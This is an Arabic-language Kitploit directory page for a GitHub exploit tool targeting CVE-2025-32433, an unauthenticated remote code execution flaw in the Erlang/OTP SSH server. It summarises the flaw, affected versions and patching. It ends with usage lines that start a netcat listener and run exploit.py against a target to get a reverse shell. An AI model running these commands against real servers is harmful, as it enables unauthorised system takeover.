Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32433 — ملخص ونظرة عامة على الهجوم CVE-2025-32433 | Kitploit
أدوات/GitHubGitHub/mrdreamreal/cve-2025-32433
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubmrdreamreal/cve-2025-32433

CVE-2025-32433

ملخص ونظرة عامة على الهجوم CVE-2025-32433

عرض المستودع
25منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-32433

CVE-2025-32433 ملخص ونظرة عامة على الهجوم

CVE-2025-32433 هي ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد (RCE) بدون مصادقة في خادم SSH الخاص بـ Erlang/OTP، تم الكشف عنها في 16 أبريل 2025. Erlang/OTP SSH هي مكتبة تُستخدم في تطبيقات موزعة واتصالات متنوعة. تنشأ الثغرة من المعالجة غير الصحيحة لرسائل بروتوكول SSH: يفشل الخادم في فرض تسلسل المصادقة الطبيعي، مما يسمح للمهاجم بإرسال رسائل SSH مصممة خصيصًا قبل المصادقة. ومن خلال ذلك، يمكن للمهاجم حقن وتنفيذ كود Erlang عشوائي على الخادم​ nvd.nist.gov ​ offsec.com . في المصطلحات العملية، هذا يعني أن المهاجم الذي لديه وصول شبكي إلى خادم SSH الخاص بـ Erlang/OTP المعرض للخطر (غالبًا ما يعمل بصلاحيات الجذر) يمكنه تشغيل قشرة عكسية أو تنفيذ أوامر دون أي بيانات اعتماد، مما يؤدي إلى اختراق النظام بالكامل​ nvd.nist.gov ​ offsec.com . تم تصنيف هذه الثغرة بدرجة CVSS 10.0 (أقصى خطورة)​ offsec.com .

الإصدارات المتأثرة هي جميع إصدارات Erlang/OTP الأقل من OTP-27.3.3 أو OTP-26.2.5.11 أو OTP-25.3.2.20 (الإصدارات التي تم تصحيحها)​ nvd.nist.gov ​ offsec.com . غالبًا ما تشمل الأنظمة المتأثرة خوادم Linux أو الأجهزة التي تعمل بخدمة SSH مبنية على Erlang (يجب عدم الخلط بينها وبين OpenSSH). والأهم من ذلك، أن خوادم OpenSSH الافتراضية على Linux/BSD ليست عرضة للخطر​ offsec.com . يجب على المستخدمين افتراض أن أي خادم SSH مكشوف من Erlang/OTP متأثر، وتطبيق التصحيحات الرسمية أو تعطيل خدمة SSH فورًا.

يعمل الهجوم عن طريق بدء اتصال SSH ثم إرسال سلسلة من رسائل SSH خارج الترتيب. :

الاستخدام:

sudo chmod +x exploit.py

nc -nvlp

python3 exploit.py -t -p 22 --lhost --lport

مثال:

nc -nvlp 5555

python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555

تنزيل الأداة